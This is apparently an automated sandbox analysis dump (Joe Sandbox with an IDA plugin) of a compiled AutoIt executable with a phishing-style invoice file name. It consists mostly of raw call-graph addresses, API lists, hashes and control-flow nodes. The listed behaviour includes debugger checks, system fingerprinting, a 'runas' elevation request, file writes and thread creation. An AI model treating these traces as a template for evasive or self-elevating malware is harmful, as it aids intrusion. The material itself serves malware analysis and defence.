calls 86129->86595 86596 47390f VariantClear 86130->86596 86131 42a886 VariantClear 86131->86142 86132 42a7e4 VariantClear 86132->86142 86133->85014 86134 40a3ce 86146 40a3d9 ctype 86134->86146 86603 40b400 VariantClear VariantClear ctype 86134->86603 86136->86134 86159 40a42c ctype 86136->86159 86582 40b400 VariantClear VariantClear ctype 86136->86582 86139 4115d7 52 API calls 86139->86142 86140 42abaf 86144 42abd4 VariantClear 86140->86144 86152 40a4ee ctype 86140->86152 86141 4115d7 52 API calls 86145 42a5a6 VariantInit VariantCopy 86141->86145 86142->86111 86142->86122 86142->86125 86142->86126 86142->86127 86142->86128 86142->86131 86142->86132 86142->86139 86142->86141 86600 470870 52 API calls 86142->86600 86601 44ccf1 VariantClear ctype 86142->86601 86143 40a4dc 86143->86152 86605 40e270 VariantClear ctype 86143->86605 86144->86152 86145->86142 86148 42a5c6 VariantClear 86145->86148 86147 40a41a 86146->86147 86154 42ab44 VariantClear 86146->86154 86146->86159 86147->86159 86604 40e270 VariantClear ctype 86147->86604 86148->86142 86149 42ac4f 86155 42ac79 VariantClear 86149->86155 86161 40a546 ctype 86149->86161 86152->86149 86153 40a534 86152->86153 86153->86161 86606 40e270 VariantClear ctype 86153->86606 86154->86159 86155->86161 86157 42ad28 86162 42ad4e VariantClear 86157->86162 86167 40a583 ctype 86157->86167 86158 40a571 86158->86167 86607 40e270 VariantClear ctype 86158->86607 86159->86140 86159->86143 86161->86157 86161->86158 86162->86167 86164 40a650 ctype 86164->85014 86165 42ae0e VariantClear 86165->86167 86167->86164 86167->86165 86608 40e270 VariantClear ctype 86167->86608 86168->85014 86169->84961 86170->84967 86171->85014 86172->85014 86173->85014 86174->85014 86175->85011 86176->85011 86177->85011 86178->85011 86179->85011 86180->85011 86181->85011 86183 403cdf 86182->86183 86184 408f40 VariantClear 86183->86184 86185 403ce7 86184->86185 86185->85005 86186->85011 86187->85011 86188->85014 86189->84958 86191 408e88 86190->86191 86193 408e94 86190->86193 86192 408f40 VariantClear 86191->86192 86192->86193 86194 45340c 85 API calls 86193->86194 86194->85913 86195->85917 86196->85919 86197->85921 86198->85905 86199->85950 86200->85933 86201->85930 86202->85951 86203->85952 86204->85950 86206 40a7a6 86205->86206 86207 40ae8c 86205->86207 86209 4115d7 52 API calls 86206->86209 86248 41130a 51 API calls __cinit 86207->86248 86231 40a7c6 ctype _memmove 86209->86231 86210 40a86d 86211 40abd1 86210->86211 86228 40a878 ctype 86210->86228 86253 45e737 90 API calls 3 library calls 86211->86253 86213 40bc10 53 API calls 86213->86231 86214 401b10 52 API calls 86214->86231 86215 42b791 VariantClear 86215->86231 86216 408e80 VariantClear 86216->86231 86217 408f40 VariantClear 86217->86228 86218 4115d7 52 API calls 86218->86231 86219 42ba2d VariantClear 86219->86231 86220 42b459 VariantClear 86220->86231 86221 40a884 ctype 86221->85951 86223 408cc0 187 API calls 86223->86231 86224 40e270 VariantClear 86224->86231 86225 42b6f6 VariantClear 86225->86231 86226 42bc5b 86226->85951 86227 4530c9 VariantClear 86227->86231 86228->86217 86228->86221 86229 42bbf5 86254 45e737 90 API calls 3 library calls 86229->86254 86230 42bb6a 86256 44b92d VariantClear 86230->86256 86231->86210 86231->86211 86231->86213 86231->86214 86231->86215 86231->86216 86231->86218 86231->86219 86231->86220 86231->86223 86231->86224 86231->86225 86231->86227 86231->86229 86231->86230 86232 4115d7 52 API calls 86231->86232 86233 40b5f0 89 API calls 86231->86233 86237 408f40 VariantClear 86231->86237 86241 42bc37 86231->86241 86249 45308a 53 API calls 86231->86249 86250 470870 52 API calls 86231->86250 86251 457f66 87 API calls __write_nolock 86231->86251 86252 472f47 127 API calls 86231->86252 86235 42b5b3 VariantInit VariantCopy 86232->86235 86233->86231 86235->86231 86238 42b5d7 VariantClear 86235->86238 86237->86231 86238->86231 86255 45e737 90 API calls 3 library calls 86241->86255 86244 42bc48 86244->86230 86245 408f40 VariantClear 86244->86245 86245->86230 86246->85938 86247->85940 86248->86231 86249->86231 86250->86231 86251->86231 86252->86231 86253->86230 86254->86230 86255->86244 86256->86226 86257->85959 86258->85962 86259->85979 86260->85978 86261->85967 86262->86000 86263->86013 86264->86000 86265->86015 86266->86000 86267->86015 86268->85996 86269->86015 86270->86001 86271->86015 86272->86015 86273->85994 86275 4289d2 86274->86275 86276 408db3 86274->86276 86305 45e737 90 API calls 3 library calls 86275->86305 86303 40bec0 90 API calls 86276->86303 86279 4289e5 86306 45e737 90 API calls 3 library calls 86279->86306 86282 428a05 86283 408f40 VariantClear 86282->86283 86289 408e5a 86283->86289 86284 40a780 194 API calls 86287 408dc9 86284->86287 86285 408e64 86286 408f40 VariantClear 86285->86286 86286->86289 86287->86279 86287->86282 86287->86284 86287->86285 86288 408f40 VariantClear 86287->86288 86287->86289 86304 40ba10 52 API calls 2 library calls 86287->86304 86288->86287 86289->86021 86291 408f40 VariantClear 86290->86291 86292 403d20 86291->86292 86293 403cd0 VariantClear 86292->86293 86294 403d4d 86293->86294 86307 45e17d 86294->86307 86317 4755ad 86294->86317 86320 40de10 86294->86320 86325 467897 86294->86325 86369 46e91c 86294->86369 86295 403d76 86295->86018 86295->86029 86301->86018 86302->86020 86303->86287 86304->86287 86305->86279 86306->86282 86308 45e198 86307->86308 86309 45e19c 86308->86309 86310 45e1b8 86308->86310 86311 408f40 VariantClear 86309->86311 86312 45e1cc 86310->86312 86313 45e1db FindClose 86310->86313 86314 45e1a4 86311->86314 86315 45e1d9 ctype 86312->86315 86372 44ae3e 86312->86372 86313->86315 86314->86295 86315->86295 86385 475077 86317->86385 86319 4755c0 86319->86295 86321 4115d7 52 API calls 86320->86321 86322 40de23 86321->86322 86323 40da20 CloseHandle 86322->86323 86324 40de2e 86323->86324 86324->86295 86326 4678bb 86325->86326 86358 467954 86326->86358 86503 45340c 85 API calls 86326->86503 86327 4115d7 52 API calls 86328 467989 86327->86328 86330 467995 86328->86330 86507 40da60 53 API calls 86328->86507 86334 4533eb 85 API calls 86330->86334 86331 4678f6 86333 413a0e __wsplitpath 46 API calls 86331->86333 86335 4678fc 86333->86335 86336 4679b7 86334->86336 86337 401b10 52 API calls 86335->86337 86491 40de40 86336->86491 86339 46790c 86337->86339 86504 40d200 52 API calls 2 library calls 86339->86504 86342 4679c7 GetLastError 86345 403cd0 VariantClear 86342->86345 86343 467a05 86348 467a2c 86343->86348 86349 467a4b 86343->86349 86344 467917 86344->86358 86505 4339fa GetFileAttributesW FindFirstFileW FindClose 86344->86505 86346 4679dc 86345->86346 86350 4679e6 86346->86350 86354 44ae3e CloseHandle 86346->86354 86353 4115d7 52 API calls 86348->86353 86351 4115d7 52 API calls 86349->86351 86357 408f40 VariantClear 86350->86357 86355 467a49 86351->86355 86352 467928 86356 46792f 86352->86356 86352->86358 86360 467a31 86353->86360 86354->86350 86364 408f40 VariantClear 86355->86364 86506 4335cd 56 API calls 3 library calls 86356->86506 86362 4679ed 86357->86362 86358->86327 86359 467964 86358->86359 86359->86295 86508 436299 52 API calls 2 library calls 86360->86508 86362->86295 86365 467939 86365->86358 86367 408f40 VariantClear 86365->86367 86368 467947 86367->86368 86368->86358 86521 46e785 86369->86521 86371 46e92f 86371->86295 86374 44ae4b ctype 86372->86374 86375 443fdf 86372->86375 86374->86315 86380 40da20 86375->86380 86377 443feb 86384 4340db CloseHandle ctype 86377->86384 86379 444001 86379->86374 86381 40da37 86380->86381 86382 40da29 86380->86382 86381->86382 86383 40da3c CloseHandle 86381->86383 86382->86377 86383->86377 86384->86379 86438 4533eb 86385->86438 86388 4750ee 86391 408f40 VariantClear 86388->86391 86389 475129 86442 4646e0 86389->86442 86396 4750f5 86391->86396 86392 47515e 86393 475162 86392->86393 86431 47518e 86392->86431 86394 408f40 VariantClear 86393->86394 86425 475169 86394->86425 86395 475357 86397 475365 86395->86397 86398 4754ea 86395->86398 86396->86319 86476 44b3ac 57 API calls 86397->86476 86482 464812 92 API calls 86398->86482 86402 4754fc 86403 475374 86402->86403 86405 475508 86402->86405 86455 430d31 86403->86455 86404 4533eb 85 API calls 86404->86431 86406 408f40 VariantClear 86405->86406 86409 47550f 86406->86409 86409->86425 86410 475388 86462 4577e9 86410->86462 86412 47539e 86470 410cfc 86412->86470 86413 475480 86415 408f40 VariantClear 86413->86415 86415->86425 86423 4754b5 86424 408f40 VariantClear 86423->86424 86424->86425 86425->86319 86431->86395 86431->86404 86431->86413 86431->86423 86431->86431 86474 436299 52 API calls 2 library calls 86431->86474 86475 463ad5 64 API calls __wcsicoll 86431->86475 86439 453404 86438->86439 86440 4533f8 86438->86440 86439->86388 86439->86389 86440->86439 86485 4531b1 85 API calls 5 library calls 86440->86485 86486 4536f7 53 API calls 86442->86486 86444 4646fc 86487 4426cd 59 API calls _wcslen 86444->86487 86446 464711 86448 40bc70 52 API calls 86446->86448 86454 46474b 86446->86454 86449 46472c 86448->86449 86488 461465 52 API calls _memmove 86449->86488 86451 464741 86452 40c600 52 API calls 86451->86452 86452->86454 86453 464793 86453->86392 86454->86453 86489 463ad5 64 API calls __wcsicoll 86454->86489 86456 430db2 86455->86456 86457 430d54 86455->86457 86456->86410 86458 4115d7 52 API calls 86457->86458 86459 430d74 86458->86459 86460 430da9 86459->86460 86461 4115d7 52 API calls 86459->86461 86460->86410 86461->86459 86463 457a84 86462->86463 86469 45780c _strcat _wcslen _wcscpy ctype 86462->86469 86463->86412 86464 45340c 85 API calls 86464->86469 86465 443006 57 API calls 86465->86469 86467 4135bb 46 API calls _malloc 86467->86469 86468 40f6f0 54 API calls 86468->86469 86469->86463 86469->86464 86469->86465 86469->86467 86469->86468 86490 44b3ac 57 API calls 86469->86490 86474->86431 86475->86431 86476->86403 86482->86402 86485->86439 86486->86444 86487->86446 86488->86451 86489->86453 86490->86469 86492 40da20 CloseHandle 86491->86492 86493 40de4e 86492->86493 86509 40f110 86493->86509 86496 4264fa 86498 40de84 86518 40e080 SetFilePointerEx SetFilePointerEx 86498->86518 86500 40de8b 86519 40f160 SetFilePointerEx SetFilePointerEx WriteFile 86500->86519 86502 40de90 86502->86342 86502->86343 86503->86331 86504->86344 86505->86352 86506->86365 86507->86330 86508->86355 86510 40f125 CreateFileW 86509->86510 86511 42630c 86509->86511 86512 40de74 86510->86512 86511->86512 86513 426311 CreateFileW 86511->86513 86512->86496 86517 40dea0 55 API calls ctype 86512->86517 86513->86512 86514 426337 86513->86514 86520 40df90 SetFilePointerEx SetFilePointerEx 86514->86520 86516 426342 86516->86512 86517->86498 86518->86500 86519->86502 86520->86516 86522 46e7a2 86521->86522 86523 4115d7 52 API calls 86522->86523 86526 46e802 86522->86526 86524 46e7ad 86523->86524 86525 46e7b9 86524->86525 86569 40da60 53 API calls 86524->86569 86531 4533eb 85 API calls 86525->86531 86527 46e7e5 86526->86527 86534 46e82f 86526->86534 86529 408f40 VariantClear 86527->86529 86530 46e7ea 86529->86530 86530->86371 86532 46e7ca 86531->86532 86535 40de40 60 API calls 86532->86535 86533 46e8b5 86562 4680ed 86533->86562 86534->86533 86537 46e845 86534->86537 86538 46e7d7 86535->86538 86540 4533eb 85 API calls 86537->86540 86538->86534 86541 46e7db 86538->86541 86539 46e8bb 86566 443fbe 86539->86566 86549 46e84b 86540->86549 86541->86527 86543 44ae3e CloseHandle 86541->86543 86542 46e87a 86570 4689f4 59 API calls 86542->86570 86543->86527 86546 46e883 86548 4013c0 52 API calls 86546->86548 86550 46e88f 86548->86550 86549->86542 86549->86546 86552 40e0a0 52 API calls 86550->86552 86551 408f40 VariantClear 86561 46e881 86551->86561 86553 46e899 86552->86553 86571 40d200 52 API calls 2 library calls 86553->86571 86555 46e911 86555->86371 86556 46e8a5 86572 4689f4 59 API calls 86556->86572 86557 40da20 CloseHandle 86558 46e903 86557->86558 86560 44ae3e CloseHandle 86558->86560 86560->86555 86561->86555 86561->86557 86563 468100 86562->86563 86564 4680fa 86562->86564 86563->86539 86573 467ac4 55 API calls 2 library calls 86564->86573 86574 443e36 86566->86574 86568 443fd3 86568->86551 86568->86561 86569->86525 86570->86561 86571->86556 86572->86561 86573->86563 86577 443e19 86574->86577 86578 443e26 86577->86578 86579 443e32 WriteFile 86577->86579 86580 443db4 SetFilePointerEx SetFilePointerEx 86578->86580 86579->86568 86580->86579 86581->86038 86582->86134 86583->86052 86584->86102 86585->86164 86586->86102 86587->86102 86588->86072 86589->86098 86590->86064 86591->86068 86592->86073 86593->86129 86594->86129 86595->86129 86596->86086 86597->86054 86598->86091 86599->86121 86600->86142 86601->86142 86602->86134 86603->86146 86604->86159 86605->86152 86606->86161 86607->86167 86608->86167 86609->86054 86610->86058 86611 42d154 86615 480a8d 86611->86615 86613 42d161 86614 480a8d 194 API calls 86613->86614 86614->86613 86616 480ae4 86615->86616 86617 480b26 86615->86617 86619 480aeb 86616->86619 86620 480b15 86616->86620 86618 40bc70 52 API calls 86617->86618 86640 480b2e 86618->86640 86621 480aee 86619->86621 86622 480b04 86619->86622 86648 4805bf 194 API calls 86620->86648 86621->86617 86624 480af3 86621->86624 86647 47fea2 194 API calls __itow_s 86622->86647 86646 47f135 194 API calls 86624->86646 86626 40e0a0 52 API calls 86626->86640 86628 408f40 VariantClear 86630 481156 86628->86630 86632 408f40 VariantClear 86630->86632 86631 480aff 86631->86628 86633 48115e 86632->86633 86633->86613 86634 40e710 53 API calls 86634->86640 86635 401980 53 API calls 86635->86640 86637 40c2c0 52 API calls 86637->86640 86638 408e80 VariantClear 86638->86640 86639 40a780 194 API calls 86639->86640 86640->86626 86640->86631 86640->86634 86640->86635 86640->86637 86640->86638 86640->86639 86642 480ff5 86640->86642 86649 45377f 52 API calls 86640->86649 86650 45e951 53 API calls 86640->86650 86651 40e830 53 API calls 86640->86651 86652 47925f 53 API calls 86640->86652 86653 47fcff 194 API calls 86640->86653 86654 45e737 90 API calls 3 library calls 86642->86654 86646->86631 86647->86631 86648->86631 86649->86640 86650->86640 86651->86640 86652->86640 86653->86640 86654->86631 86655 42b14b 86662 40bc10 86655->86662 86657 42b159 86658 4096a0 331 API calls 86657->86658 86659 42b177 86658->86659 86673 44b92d VariantClear 86659->86673 86661 42bc5b 86663 40bc24 86662->86663 86664 40bc17 86662->86664 86666 40bc2a 86663->86666 86667 40bc3c 86663->86667 86665 408e80 VariantClear 86664->86665 86668 40bc1f 86665->86668 86669 408e80 VariantClear 86666->86669 86670 4115d7 52 API calls 86667->86670 86668->86657 86671 40bc33 86669->86671 86672 40bc43 86670->86672 86671->86657 86672->86657 86673->86661 86674 425b2b 86679 40f000 86674->86679 86678 425b3a 86680 4115d7 52 API calls 86679->86680 86681 40f007 86680->86681 86682 4276ea 86681->86682 86688 40f030 86681->86688 86687 41130a 51 API calls __cinit 86687->86678 86689 40f039 86688->86689 86690 40f01a 86688->86690 86718 41130a 51 API calls __cinit 86689->86718 86692 40e500 86690->86692 86693 40bc70 52 API calls 86692->86693 86694 40e515 GetVersionExW 86693->86694 86695 402160 52 API calls 86694->86695 86696 40e557 86695->86696 86719 40e660 86696->86719 86702 427674 86706 4276c6 GetSystemInfo 86702->86706 86704 40e5e0 86707 4276d5 GetSystemInfo 86704->86707 86733 40efd0 86704->86733 86705 40e5cd GetCurrentProcess 86740 40ef20 LoadLibraryA GetProcAddress 86705->86740 86706->86707 86711 40e629 86737 40ef90 86711->86737 86714 40e641 FreeLibrary 86715 40e644 86714->86715 86716 40e653 FreeLibrary 86715->86716 86717 40e656 86715->86717 86716->86717 86717->86687 86718->86690 86720 40e667 86719->86720 86721 42761d 86720->86721 86722 40c600 52 API calls 86720->86722 86723 40e55c 86722->86723 86724 40e680 86723->86724 86725 40e687 86724->86725 86726 427616 86725->86726 86727 40c600 52 API calls 86725->86727 86728 40e566 86727->86728 86728->86702 86729 40ef60 86728->86729 86730 40e5c8 86729->86730 86731 40ef66 LoadLibraryA 86729->86731 86730->86704 86730->86705 86731->86730 86732 40ef77 GetProcAddress 86731->86732 86732->86730 86734 40e620 86733->86734 86735 40efd6 LoadLibraryA 86733->86735 86734->86706 86734->86711 86735->86734 86736 40efe7 GetProcAddress 86735->86736 86736->86734 86741 40efb0 LoadLibraryA GetProcAddress 86737->86741 86739 40e632 GetNativeSystemInfo 86739->86714 86739->86715 86740->86704 86741->86739 86742 411a3b8 86756 4118008 86742->86756 86744 411a4a6 86759 411a2a8 86744->86759 86758 4118693 86756->86758 86762 411b4d8 GetPEB 86756->86762 86758->86744 86760 411a2b1 Sleep 86759->86760 86761 411a2bf 86760->86761 86762->86758 86763 425b5e 86768 40c7f0 86763->86768 86767 425b6d 86803 40db10 52 API calls 86768->86803 86770 40c82a 86804 410ab0 6 API calls 86770->86804 86772 40c86d 86773 40bc70 52 API calls 86772->86773 86774 40c877 86773->86774 86775 40bc70 52 API calls 86774->86775 86776 40c881 86775->86776 86777 40bc70 52 API calls 86776->86777 86778 40c88b 86777->86778 86779 40bc70 52 API calls 86778->86779 86780 40c8d1 86779->86780 86781 40bc70 52 API calls 86780->86781 86782 40c991 86781->86782 86805 40d2c0 52 API calls 86782->86805 86784 40c99b 86806 40d0d0 53 API calls 86784->86806 86786 40c9c1 86787 40bc70 52 API calls 86786->86787 86788 40c9cb 86787->86788 86807 40e310 53 API calls 86788->86807 86790 40ca28 86791 408f40 VariantClear 86790->86791 86792 40ca30 86791->86792 86793 408f40 VariantClear 86792->86793 86794 40ca38 GetStdHandle 86793->86794 86795 429630 86794->86795 86796 40ca87 86794->86796 86795->86796 86797 429639 86795->86797 86802 41130a 51 API calls __cinit 86796->86802 86808 4432c0 57 API calls 86797->86808 86799 429641 86809 44b6ab CreateThread 86799->86809 86801 42964f CloseHandle 86801->86796 86802->86767 86803->86770 86804->86772 86805->86784 86806->86786 86807->86790 86808->86799 86809->86801 86810 44b5cb 58 API calls 86809->86810 86811 425b6f 86816 40dc90 86811->86816 86815 425b7e 86817 40bc70 52 API calls 86816->86817 86818 40dd03 86817->86818 86825 40f210 86818->86825 86820 426a97 86822 40dd96 86822->86820 86823 40ddb7 86822->86823 86828 40dc00 52 API calls 2 library calls 86822->86828 86824 41130a 51 API calls __cinit 86823->86824 86824->86815 86829 40f250 RegOpenKeyExW 86825->86829 86827 40f230 86827->86822 86828->86822 86830 425e17 86829->86830 86831 40f275 RegQueryValueExW 86829->86831 86830->86827 86832 40f2c3 RegCloseKey 86831->86832 86833 40f298 86831->86833 86832->86827 86834 40f2a9 RegCloseKey 86833->86834 86835 425e1d 86833->86835 86834->86827
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 004096C1
                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • _memmove.LIBCMT ref: 0040970C
                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                          • _memmove.LIBCMT ref: 00409D96
                                                          • _memmove.LIBCMT ref: 0040A6C4
                                                          • _memmove.LIBCMT ref: 004297E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                          • String ID:
                                                          • API String ID: 2383988440-0
                                                          • Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                          • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                          • Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                          • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                            • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe,00000104,?), ref: 00401F4C
                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                            • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                          • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                          • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                            • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                          • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                          • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                          • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                            • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                            • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                            • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                            • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                            • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                            • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                            • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                          • String ID: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                          • API String ID: 2495805114-3233807181
                                                          • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                          • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                          • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                          • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1920 427693-427696 1915->1920 1921 427688-427691 1915->1921 1919 4276b4-4276be 1916->1919 1922 427625-427629 1917->1922 1923 40e59c-40e59f 1917->1923 1936 40e5ec-40e60c 1918->1936 1937 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1937 1938 4276c6-4276ca GetSystemInfo 1919->1938 1920->1919 1927 427698-4276a8 1920->1927 1921->1919 1929 427636-427640 1922->1929 1930 42762b-427631 1922->1930 1925 40e5a5-40e5ae 1923->1925 1926 427654-427657 1923->1926 1932 40e5b4 1925->1932 1933 427645-42764f 1925->1933 1926->1918 1931 42765d-42766f 1926->1931 1934 4276b0 1927->1934 1935 4276aa-4276ae 1927->1935 1929->1918 1930->1918 1931->1918 1932->1918 1933->1918 1934->1919 1935->1919 1939 40e612-40e623 call 40efd0 1936->1939 1940 4276d5-4276df GetSystemInfo 1936->1940 1937->1936 1947 40e5e8 1937->1947 1938->1940 1939->1938 1946 40e629-40e63f call 40ef90 GetNativeSystemInfo 1939->1946 1950 40e641-40e642 FreeLibrary 1946->1950 1951 40e644-40e651 1946->1951 1947->1936 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                          • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                          • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                          • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                          • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                          • String ID: 0SH
                                                          • API String ID: 3363477735-851180471
                                                          • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                          • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                          • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                          • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                          Strings
                                                          Memory Dump Source
